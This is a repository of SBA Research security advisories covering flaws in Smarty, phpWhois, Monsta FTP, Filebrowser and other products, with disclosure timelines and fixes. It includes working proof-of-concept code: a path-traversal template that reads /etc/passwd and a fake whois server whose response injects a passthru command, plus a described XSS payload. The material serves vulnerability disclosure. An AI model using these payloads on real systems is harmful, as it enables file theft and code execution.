├── 2015 ├── RXTEC_20150513 │ └── README.md ├── Polycom_20150513 │ └── README.md └── knAx_20150101 │ └── README.md ├── 2018 ├── SBA-ADV-20180420-01_Smarty_Path_Traversal │ ├── composer.json │ ├── poc.php │ └── README.md ├── SBA-ADV-20180425-01_phpWhois_Code_Execution │ ├── composer.json │ ├── poc.php │ ├── pocserver.py │ └── README.md ├── SBA-ADV-20180410-01_Teltonika_Cross_Site_Scripting │ └── README.md ├── SBA-ADV-20180319-02_Teltonika_Incorrect_Access_Control │ └── README.md └── SBA-ADV-20180319-01_Teltonika_OS_Command_Injection │ └── README.md ├── 2019 ├── SBA-ADV-20191211-01_Monsta_FTP_Stored_XSS │ └── README.md ├── SBA-ADV-20191203-01_Monsta_FTP_Arbitrary_File_Read_and_Write │ └── README.md ├── SBA-ADV-20191203-02_Monsta_FTP_Server-Side_Request_Forgery │ └── README.md ├── SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS │ └── README.md ├── SBA-ADV-20190911-01_Easy_FancyBox_WP_Plugin_Stored_XSS │ └── README.md ├── SBA-ADV-20190913-01_WordPress_Plugin_EU_Cookie_Law │ └── README.md ├── SBA-ADV-20190913-02_WordPress_Plugin_Broken_Link_Checker │ └── README.md ├── SBA-ADV-20190913-04_WordPress_Plugin_All_in_One_SEO_Pack │ └── README.md └── SBA-ADV-20190913-03_WordPress_Plugin_Events_Manager │ └── README.md ├── 2020 ├── SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure │ └── README.md └── SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands │ └── README.md ├── 2022 ├── SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management │ └── README.md ├── SBA-ADV-20220328-01_Vtiger_CRM_Stored_Cross-Site_Scripting │ └── README.md └── SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF │ └── README.md ├── 2024 ├── SBA-ADV-20241209-02_Laravel_Reflected_XSS_via_Route_Parameter_in_Debug-Mode_Error_Page │ └── README.md ├── SBA-ADV-20241209-01_Laravel_Reflected_XSS_via_Request_Parameter_in_Debug-Mode_Error_Page │ └── README.md ├── SBA-ADV-20240202-02_CraftCMS_Plugin_Two-Factor_Authentication_TOTP_Valid_After_Use │ └── README.md ├── SBA-ADV-20240202-01_CraftCMS_Plugin_Two-Factor_Authentication_Password_Hash_Disclosure │ └── README.md ├── SBA-ADV-20240321-01_Paradox_Cross_Site_Request_Forgery │ └── README.md └── SBA-ADV-20240617-01_CraftCMS_TOTP_Valid_After_Use │ └── README.md ├── 2025 ├── SBA-ADV-20250325-04_Filebrowser_Stored_XSS │ ├── images │ │ └── xss_executed.png │ └── README.md ├── SBA-ADV-20250730-01_Checkmk_Path_Traversal │ └── images │ │ ├── schedule_new.png │ │ ├── schedule_execute.png │ │ ├── schedule_path_traversal.png │ │ └── schedule_path_traversal_2.png ├── SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting │ ├── images │ │ ├── xss_in_dom.png │ │ ├── xss_escaped.png │ │ ├── xss_executed.png │ │ └── rce_via_admin_session.png │ └── README.md ├── SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash │ ├── images │ │ ├── Certificate Error.png │ │ └── Security Warning.png │ └── README.md ├── SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling │ ├── images │ │ ├── Security Warning.png │ │ ├── Certificate Error.png │ │ └── Windows Certificate Store.png │ └── README.md ├── SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist │ ├── images │ │ ├── allowlistbypass_exploit.png │ │ └── allowlistbypass_configuration.png │ └── README.md ├── SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable │ ├── images │ │ └── filebrowser_sharedialog.png │ └── README.md ├── SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands │ ├── images │ │ └── execute_subcommand_with_find.png │ └── README.md ├── SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling │ ├── images │ │ └── filebrowser_documentation_admincredentials.png │ └── README.md ├── SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope │ ├── images │ │ └── commandexecution_readpasswordhashes.png │ └── README.md ├── SBA-ADV-20250327-03_Filebrowser_Sensitive_Data_Transferred_In_URL │ └── README.md └── SBA-ADV-20250325-03_Filebrowser_Insecure_File_Permissions │ └── README.md └── README.md /README.md: -------------------------------------------------------------------------------- 1 | # SBA Research Security Advisories 2 | 3 | Security advisories published by [SBA Research](https://www.sba-research.org). -------------------------------------------------------------------------------- /2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "require": { 3 | "smarty/smarty": "3.1.32" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "require": { 3 | "jsmitty12/phpWhois": "5.0.2" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/images/xss_executed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/images/xss_executed.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_new.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_new.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_in_dom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_in_dom.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_execute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_execute.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_escaped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_escaped.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_executed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_executed.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal_2.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Certificate Error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Certificate Error.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Security Warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Security Warning.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/rce_via_admin_session.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/rce_via_admin_session.png -------------------------------------------------------------------------------- /2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/poc.php: -------------------------------------------------------------------------------- 1 | useServer('org', '127.0.0.1:9999'); 6 | echo $whois->lookup('example.org'); 7 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Security Warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Security Warning.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Certificate Error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Certificate Error.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Windows Certificate Store.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Windows Certificate Store.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_exploit.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_configuration.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_configuration.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/images/filebrowser_sharedialog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/images/filebrowser_sharedialog.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/images/execute_subcommand_with_find.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/images/execute_subcommand_with_find.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/images/filebrowser_documentation_admincredentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/images/filebrowser_documentation_admincredentials.png -------------------------------------------------------------------------------- /2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/images/commandexecution_readpasswordhashes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/images/commandexecution_readpasswordhashes.png -------------------------------------------------------------------------------- /2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/poc.php: -------------------------------------------------------------------------------- 1 | enableSecurity(); 6 | // Fails 7 | //$smarty->display('eval:{fetch file="/etc/passwd"}'); 8 | // Works 9 | $smarty->display('eval:{fetch file="'.addslashes(getcwd()).'/templates/../../../../../etc/passwd"}'); 10 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/pocserver.py: -------------------------------------------------------------------------------- 1 | import SocketServer 2 | 3 | DATA = "Registrant Name: ${passthru('id')}\n" 4 | 5 | class WhoisHandler(SocketServer.BaseRequestHandler): 6 | def handle(self): 7 | self.request.recv(1024) 8 | print('Request received') 9 | self.request.sendall(DATA) 10 | print('Payload sent') 11 | 12 | if __name__ == '__main__': 13 | SocketServer.ThreadingTCPServer.allow_reuse_address = True 14 | server = SocketServer.ThreadingTCPServer(('127.0.0.1', 9999), WhoisHandler) 15 | server.serve_forever() 16 | -------------------------------------------------------------------------------- /2015/RXTEC_20150513/README.md: -------------------------------------------------------------------------------- 1 | # SQL Injection Vulnerability in RXTEC RXAdmin # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | SQL injection vulnerability in the RXTEC RXAdmin Login Page allows 6 | remote attackers to execute arbitrary SQL commands via several HTTP 7 | parameter. 8 | 9 | * **Identifier** : RXTEC_20150513 10 | * **Type of Vulnerability** : SQL injection 11 | * **Software/Product Name** : RXTEC RXAdmin Login 12 | * **Vendor** : RXTEC (www.rxtec.net) 13 | * **Affected Versions** : UPDATE : 06 / 2012 14 | * **Fixed in Version** : *unknown* 15 | * **CVE ID** : CVE-2015-8298 16 | * **Impact** : Critical 17 | 18 | ## Impact ## 19 | 20 | It is possible to extract all information from the database in use by 21 | the application. Depending on the configuration of the SQL server 22 | arbitrary code execution might be possible. 23 | 24 | ## Vulnerability Description ## 25 | 26 | The following parameters are affectey by the vulnerability: 27 | 28 | * `/index.htm` (loginpassword parameter) 29 | * `/index.htm` (loginusername parameter) 30 | * `/index.htm` (zusätzlicher parameter) 31 | * `/index.htm` (zusätzlicher parameter) 32 | * `/index.htm` (rxtec cookie) 33 | * `/index.htm` (groupid parameter) 34 | 35 | ## Proof-of-Concept ## 36 | 37 | *none* 38 | 39 | ## Timeline ## 40 | 41 | * `2015-04-30` identification of vulnerability 42 | * `2015-05-11` vendor contact (won't fix because of outdated version) 43 | * `2015-07-14` contact cve-request@mitre. 44 | 45 | ## Credits ## 46 | 47 | * Thomas Konrad ([SBA Research](https://www.sba-research.org/)) 48 | -------------------------------------------------------------------------------- /2015/Polycom_20150513/README.md: -------------------------------------------------------------------------------- 1 | # Polycom BToE Connector Privilege Escalation Vulnerability # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Polycom BToE Connector up to version 2.3.0 allows unprivileged windows 6 | users to execute arbitrary code with SYSTEM privileges. 7 | 8 | * **Identifier** : Polycom_20150513 9 | * **Type of Vulnerability** : Privilege Escalation 10 | * **Exploitation Vector** : local 11 | * **Software/Product Name** : Polycom BToE Connector 12 | * **Vendor** : Polycom Inc. 13 | * **Affected Versions** : All Version including 2.3.0 14 | * **Fixed in Version** : Versions 3.0.0 (Released March 2015) 15 | * **CVE ID** : CVE-2015-8300 16 | * **CVSSv2 Vector** : (AV:L/AC:L/Au:S/C:C/I:C/A:N) 17 | * **CVSSv2 Base Score** : 6.2 18 | 19 | ## Impact ## 20 | 21 | Code execution with SYSTEM privileges. 22 | 23 | ## Vulnerability Description ## 24 | 25 | The Polycom BToE Connector Version up to version 2.3.0 allows a local 26 | user to gain local administrator privileges. 27 | 28 | The software creates a windows service running with SYSTEM privileges 29 | using the following file (standard installation path): 30 | 31 | ```text 32 | C:\program files (x86)\polycom\polycom btoe connector\plcmbtoesrv.exe 33 | ``` 34 | 35 | The default installation allows everyone to replace the `plcmbtoesrv.exe` 36 | file allowing unprivileged users to execute arbitrary commands on the 37 | windows host. 38 | 39 | ## Proof-of-Concept ## 40 | 41 | *none* 42 | 43 | ## Timeline ## 44 | 45 | * `2014-12-19` identification of vulnerability 46 | * `2015-01-01` vendor contacted via customer 47 | * `2015-03-01` vendor released fixed version 3.0.0 48 | * `2015-07-14` contact cve-request@mitre. 49 | 50 | ## References ## 51 | 52 | * Download secure version 3.0.0 53 | 54 | ## Credits ## 55 | 56 | * Severin Winkler ([SBA Research](https://www.sba-research.org/)) 57 | * Ulrich Bayer ([SBA Research](https://www.sba-research.org/)) 58 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20191211-01_Monsta_FTP_Stored_XSS/README.md: -------------------------------------------------------------------------------- 1 | # Monsta FTP Stored Cross-Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting 6 | vulnerability in the language setting due to insufficient output encoding. 7 | 8 | * **Identifier** : SBA-ADV-20191211-01 9 | * **Type of Vulnerability** : Cross Site Scripting 10 | * **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/) 11 | * **Vendor** : Monsta Limited 12 | * **Affected Versions** : <= 2.10.1 13 | * **Fixed in Version** : Not yet 14 | * **CVE ID** : CVE-2020-14055 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 16 | * **CVSS Base Score** : 8.2 (High) 17 | 18 | ## Vendor Description ## 19 | 20 | > Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can 21 | > use to manage your website through your browser, edit code, upload and 22 | > download files, copy/move/delete files and folders - all without 23 | > installing any desktop software. 24 | 25 | Source: 26 | 27 | ## Impact ## 28 | 29 | By exploiting the documented vulnerabilities, an unauthenticated attacker 30 | can store JavaScript code on the server. The Monsta FTP instance 31 | delivers the JavaScript code to each user, which is then executed in the 32 | user's browser within the origin of the Monsta FTP instance. 33 | This might lead to information leakage like FTP credentials and can also 34 | affect other applications running within the same origin. 35 | 36 | ## Vulnerability Description ## 37 | 38 | *redacted* 39 | 40 | ## Proof of Concept ## 41 | 42 | *redacted* 43 | 44 | ## Recommended Countermeasures ## 45 | 46 | We are not aware of a vendor fix yet. Please contact the vendor. 47 | 48 | *redacted* 49 | 50 | ## Timeline ## 51 | 52 | * `2019-12-10`: initial vendor contact 53 | * `2019-12-11`: identification of vulnerability in version 2.10 54 | * `2019-12-14`: vendor released version 2.10.1 55 | * `2019-12-14`: vendor response with security contact 56 | * `2019-12-16`: first try to disclose vulnerability to vendor security contact 57 | * `2020-01-13`: disclosed vulnerability to vendor security contact 58 | * `2020-06-12`: re-test of vulnerability in version 2.10.1 59 | * `2020-06-12`: request CVE from MITRE 60 | * `2020-06-12`: MITRE assigned CVE-2020-14055 61 | * `2020-07-01`: public disclosure with redacted technical details 62 | 63 | ## Credits ## 64 | 65 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 66 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20191203-01_Monsta_FTP_Arbitrary_File_Read_and_Write/README.md: -------------------------------------------------------------------------------- 1 | # Monsta FTP Arbitrary File Read and Write # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Monsta FTP 2.10.1 or below allows external control of paths used in 6 | filesystem operations. This allows attackers to read and write arbitrary 7 | local files, allowing an attacker to gain remote code execution in 8 | common deployments. 9 | 10 | * **Identifier** : SBA-ADV-20191203-01 11 | * **Type of Vulnerability** : External Control of File Name or Path 12 | * **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/) 13 | * **Vendor** : Monsta Limited 14 | * **Affected Versions** : <= 2.10.1 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2020-14057 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 18 | * **CVSS Base Score** : 9.8 (Critical) 19 | 20 | ## Vendor Description ## 21 | 22 | > Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can 23 | > use to manage your website through your browser, edit code, upload and 24 | > download files, copy/move/delete files and folders - all without 25 | > installing any desktop software. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | An unauthenticated attacker can read and write arbitrary local files 32 | accessible by the webserver by exploiting the vulnerability documented 33 | in this advisory. Sensitive data such as database credentials might get 34 | exposed through this attack. Moreover, an attacker might gain remote 35 | code execution by uploading PHP scripts in the web root and calling it via 36 | the webserver. 37 | 38 | ## Vulnerability Description ## 39 | 40 | *redacted* 41 | 42 | ## Proof of Concept ## 43 | 44 | *redacted* 45 | 46 | ## Recommended Countermeasures ## 47 | 48 | We are not aware of a vendor fix yet. Please contact the vendor. 49 | 50 | *redacted* 51 | 52 | ## Timeline ## 53 | 54 | * `2019-12-03`: identification of vulnerability in version 2.10 55 | * `2019-12-10`: initial vendor contact 56 | * `2019-12-14`: vendor released version 2.10.1 57 | * `2019-12-14`: vendor response with security contact 58 | * `2019-12-16`: first try to disclose vulnerability to vendor security contact 59 | * `2020-01-13`: disclosed vulnerability to vendor security contact 60 | * `2020-06-12`: re-test of vulnerability in version 2.10.1 61 | * `2020-06-12`: request CVE from MITRE 62 | * `2020-06-12`: MITRE assigned CVE-2020-14057 63 | * `2020-07-01`: public disclosure with redacted technical details 64 | 65 | ## Credits ## 66 | 67 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 68 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20191203-02_Monsta_FTP_Server-Side_Request_Forgery/README.md: -------------------------------------------------------------------------------- 1 | # Monsta FTP Server-Side Request Forgery # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Monsta FTP 2.10.1 or below is prone to a server-side request forgery 6 | vulnerability due to insufficient restriction of the web fetch 7 | functionality. This allows attackers to read arbitrary local files and 8 | interact with arbitrary third-party services. 9 | 10 | * **Identifier** : SBA-ADV-20191203-02 11 | * **Type of Vulnerability** : Server-Side Request Forgery (SSRF) 12 | * **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/) 13 | * **Vendor** : Monsta Limited 14 | * **Affected Versions** : <= 2.10.1 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2020-14056 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 18 | * **CVSS Base Score** : 9.8 (Critical) 19 | 20 | ## Vendor Description ## 21 | 22 | > Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can 23 | > use to manage your website through your browser, edit code, upload and 24 | > download files, copy/move/delete files and folders - all without 25 | > installing any desktop software. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | An unauthenticated attacker can read arbitrary local files accessible by 32 | the webserver by exploiting the vulnerability documented in this 33 | advisory. Sensitive data such as database credentials might get exposed 34 | through this attack. Moreover, an attacker can interact with arbitrary 35 | third-party services. This might lead to information leakage from or 36 | manipulation of internal services. 37 | 38 | ## Vulnerability Description ## 39 | 40 | *redacted* 41 | 42 | ## Proof of Concept ## 43 | 44 | *redacted* 45 | 46 | ## Recommended Countermeasures ## 47 | 48 | We are not aware of a vendor fix yet. Please contact the vendor. 49 | 50 | *redacted* 51 | 52 | ## Timeline ## 53 | 54 | * `2019-12-03`: identification of vulnerability in version 2.10 55 | * `2019-12-10`: initial vendor contact 56 | * `2019-12-14`: vendor released version 2.10.1 57 | * `2019-12-14`: vendor response with security contact 58 | * `2019-12-16`: first try to disclose vulnerability to vendor security contact 59 | * `2020-01-13`: disclosed vulnerability to vendor security contact 60 | * `2020-06-12`: re-test of vulnerability in version 2.10.1 61 | * `2020-06-12`: request CVE from MITRE 62 | * `2020-06-12`: MITRE assigned CVE-2020-14056 63 | * `2020-07-01`: public disclosure with redacted technical details 64 | 65 | ## Credits ## 66 | 67 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 68 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Stored Cross-Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Markdown preview function of Filebrowser is vulnerable to *Stored 6 | Cross-Site-Scripting (XSS)*. Any JavaScript code that is part of a Markdown 7 | file uploaded by a user will be executed by the browser. 8 | 9 | * **Identifier** : SBA-ADV-20250325-04 10 | * **Type of Vulnerability** : Stored XSS 11 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 12 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 13 | * **Affected Versions** : <= 2.33.6 14 | * **Fixed in Version** : 2.33.7 15 | * **CVE ID** : CVE-2025-52902 16 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N 17 | * **CVSS Base Score** : 7.6 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > filebrowser provides a file managing interface within a specified directory 22 | > and it can be used to upload, delete, preview, rename and edit your files. 23 | > It allows the creation of multiple users and each user can have its own 24 | > directory. It can be used as a standalone app. 25 | 26 | Source: 27 | 28 | ## Impact ## 29 | 30 | A user can upload a malicious Markdown file to the application which can 31 | contain arbitrary HTML code. If another user within the same scope clicks on 32 | that file, a rendered preview is opened. JavaScript code that has been 33 | included will be executed. 34 | 35 | Malicious actions that are possible include: 36 | 37 | * Obtaining a user's session token 38 | * Elevating the attacker's privileges, if the victim is an administrator 39 | (e.g., gaining command execution rights) 40 | 41 | ## Vulnerability Description ## 42 | 43 | Most Markdown parsers accept arbitrary HTML in a document and try rendering 44 | it accordingly. For instance, if one creates a file called `xss.md` with the 45 | following content 46 | 47 | ```markdown 48 | # Hallo 49 | 50 | foo 51 | 52 | 53 | bar 54 | ``` 55 | 56 | bold and italic text will be rendered. Also, the renderer used in Filebrowser 57 | will try to display the image and execute the code in the `onerror` event 58 | handler. 59 | 60 | ## Proof of Concept ## 61 | 62 | The screenshot shows that the code from the file mentioned above has 63 | actually been executed in the victim's browser: 64 | 65 | ![JavaScript code being executed in the Markdown Preview](images/xss_executed.png) 66 | 67 | ## Recommended Countermeasures ## 68 | 69 | The most thorough fix would be to reconfigure the application's Markdown 70 | parser to ignore all HTML elements and only render rich text which is part of 71 | the Markdown specification. If HTML rendering is considered to be a required 72 | feature, an HTML sanitizer like DOMPurify should be used, preferably in 73 | conjunction with a *Content Security Policy* (CSP). 74 | 75 | ## Timeline ## 76 | 77 | * `2025-03-25` Identified the vulnerability in version 2.32.0 78 | * `2025-04-11` Contacted the project 79 | * `2025-04-18` Vulnerability disclosed to the project 80 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 81 | * `2025-06-26` CVE ID assigned by GitHub 82 | * `2025-06-26` Fix released with version 2.33.7 83 | * `2025-06-26` Advisory published by project as `GHSA-4wx8-5gm2-2j97` 84 | 85 | ## References ## 86 | 87 | * DOMPurify: 88 | * GitHub Security Advisory: 89 | 90 | ## Credits ## 91 | 92 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 93 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-03_Filebrowser_Sensitive_Data_Transferred_In_URL/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Sensitive Data Transferred in URL # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | URLs that are accessed by a user are commonly logged in many locations, both 6 | server- and client-side. It is thus good practice to never transmit any 7 | secret information as part of a URL. Filebrowser violates this 8 | practice, since access tokens are used as GET parameters. 9 | 10 | * **Identifier** : SBA-ADV-20250327-03 11 | * **Type of Vulnerability** : Information Disclosure 12 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 13 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 14 | * **Affected Versions** : <= 2.33.8 15 | * **Fixed in Version** : 2.33.9 16 | * **CVE ID** : CVE-2025-52901 17 | * **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 18 | * **CVSS Base Score** : 4.5 (Medium) 19 | 20 | ## Vendor Description ## 21 | 22 | > filebrowser provides a file managing interface within a specified directory 23 | > and it can be used to upload, delete, preview, rename and edit your files. 24 | > It allows the creation of multiple users and each user can have its own 25 | > directory. It can be used as a standalone app. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | The *JSON Web Token (JWT)* which is used as a session identifier will get 32 | leaked to anyone having access to the URLs accessed by the user. This will 33 | give the attacker full access to the user's account and, in consequence, to 34 | all sensitive files the user has access to. 35 | 36 | ## Vulnerability Description ## 37 | 38 | Sensitive information in URLs is logged by several components (see the 39 | following examples), even if access is protected by TLS. 40 | 41 | * The browser history 42 | * The access logs on the affected web server 43 | * Proxy servers or reverse proxy servers 44 | * Third-party servers via the HTTP referrer header 45 | 46 | In case attackers can access certain logs, they could read the included 47 | sensitive data. 48 | 49 | ## Proof of Concept ## 50 | 51 | When a file is downloaded via the web interface, the JWT is part of the URL: 52 | 53 | ```http 54 | GET /api/raw/testdir/testfile.txt?auth=eyJh[...]_r4EQ HTTP/1.1 55 | Host: filebrowser.local:8080 56 | Referer: http://filebrowser.local:8080/files/testdir/ 57 | Cookie: auth=eyJh[...]_r4EQ 58 | [...] 59 | ``` 60 | 61 | This also happens when a new *command session* is started: 62 | 63 | ```http 64 | GET /api/command/?auth=eyJh[...]YW8BA HTTP/1.1 65 | Host: filebrowser.local:8080 66 | Sec-WebSocket-Version: 13 67 | Origin: http://filebrowser.local:8080 68 | Sec-WebSocket-Key: oqQMrF7R34D3lAkj1+ZHTw== 69 | Cookie: auth=eyJh[...]YW8BA 70 | Upgrade: websocket 71 | [...] 72 | ``` 73 | 74 | ## Recommended Countermeasures ## 75 | 76 | Sensitive data like session tokens or user credentials should be transmitted 77 | via HTTP headers or the HTTP body only, never in the URL. 78 | 79 | ## Timeline ## 80 | 81 | * `2025-03-27` Identified the vulnerability in version 2.32.0 82 | * `2025-04-11` Contacted the project 83 | * `2025-04-29` Vulnerability disclosed to the project 84 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 85 | * `2025-06-26` CVE ID assigned by GitHub 